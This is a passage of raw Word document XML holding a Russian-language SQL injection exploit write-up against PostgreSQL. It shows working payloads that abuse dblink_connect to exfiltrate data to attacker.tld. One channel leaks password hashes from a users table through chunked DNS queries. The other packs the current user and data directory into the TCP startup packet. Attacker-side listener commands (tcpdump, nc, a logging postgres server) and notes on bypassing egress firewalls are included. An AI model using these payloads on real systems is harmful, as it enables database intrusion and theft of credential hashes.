      </w:r>
    </w:p>
    <w:p w14:paraId="1B9DCD8D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    WITH data AS (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE35C76" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        SELECT encode(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205EE439" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            convert_to((SELECT string_agg(password_hash, ',') FROM users), 'UTF8'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736631E0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            'hex'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3294500B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        ) AS hex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECF7E99" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7938B428" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    SELECT substring(hex FROM (i*60+1) FOR 60) AS c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F64570C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    FROM data, generate_series(0, (length(hex)-1)/60) i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176C2C39" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) chunks --'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE93769" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">На каждый chunk идёт отдельный DNS-запрос. Атакующий на authoritative-сервере склеивает labels в порядке прихода, делает hex-decode, разбивает по </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — получает все </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>password_hash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> из таблицы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. При пустой таблице </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>generate_series(0, -1)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> вернёт пустое множество — DNS-запросов не будет, это штатное поведение.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFF9388" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>На стороне атакующего:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CBA0D2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># Authoritative DNS с query-log (bind):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E57F05" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>options { querylog yes; };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2046976B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># Или коллектор поверх tcpdump:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2BAAFA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tcpdump -i any -nn -s0 'udp port 53' -w queries.pcap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594B211F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload C — TCP-канал, прямой (startup-packet)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3242761C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Атакующий поднимает TCP-listener на 5432, получает значения, упакованные в поля </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>application_name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> startup-пакета. SSL не требуется — libpq до SSL handshake шлёт startup-packet plaintext.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB9CD77" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload (подставляется вместо `name`):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050C180A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>x' UNION SELECT 1, dblink_connect('host=attacker.tld port=5432 user=' || current_user || ' application_name=' || current_setting('data_directory') || ' dbname=x password=x') --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C02E7E3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5686C867" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, email FROM users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC30890" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE name = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542C3A6D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT 1, dblink_connect(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCA57B1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    'host=attacker.tld port=5432 '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5092F0F3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    'user=' || current_user || ' '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30327757" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    'application_name=' || current_setting('data_directory') || ' '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B190F03" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    'dbname=x password=x'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B61A7BB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) --'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6C68E7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>На стороне атакующего (минимум):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46015A0F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nc -lvp 5432 | xxd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE8B9C1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>либо полноценный PG-сервер, который сам распарсит startup-packet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472B05D1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres -D /tmp/empty --port=5432 --listen-addresses='*' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588B018F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  -c log_connections=on \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C7B499" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  -c log_line_prefix='%m [%p] user=%u db=%d app=%a '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73682FC4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Любые SQL-выражения, которые роль application может вычислить (включая подзапросы из системных view), можно вшить в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>application_name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Лимит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>application_name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 64 символа по умолчанию (GUC-параметр). Для значений длиннее — разбивай через несколько коннектов или используй DNS-канал (Payload B).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFD5867" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Эксфильтрация любых SELECT-данных, к которым имеет доступ application-роль, без необходимости получать данные через HTTP-ответ или error message. DNS-канал работает даже если egress firewall режет outbound TCP — UDP/53 наружу почти всегда открыт.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58355E54" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Почему это работает.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1270A08C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dblink_connect()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> под капотом вызывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PQconnectdb()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> внутри backend-процесса PostgreSQL. Conninfo не валидируется как user input — функция спроектирована для DBA-сценариев federation/ETL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CBE125" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   libpq в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PQconnectdb()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> первым шагом делает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>getaddrinfo(host)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — независимо от того, удастся ли затем TCP. DNS-запрос уходит из IP-адреса PostgreSQL-хоста до любого TCP-handshake.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79890A73" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   При успешном </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>getaddrinfo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libpq делает TCP-коннект и сразу же шлёт startup-packet (фрейм с protocol version 196608 + key/value пары </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>database</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>application_name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, опции). Эта последовательность жёстко зашита в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fe-connect.c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и не зависит от настроек сервера-приёмника.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1962DEF5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sslmode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не указан (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sslmode=prefer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — дефолт) и сервер-приёмник не отвечает на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SSLRequest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> положительно — startup-packet идёт plaintext.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0110162E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT 1, dblink_connect(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> валиден потому, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dblink_connect(text)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> возвращает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
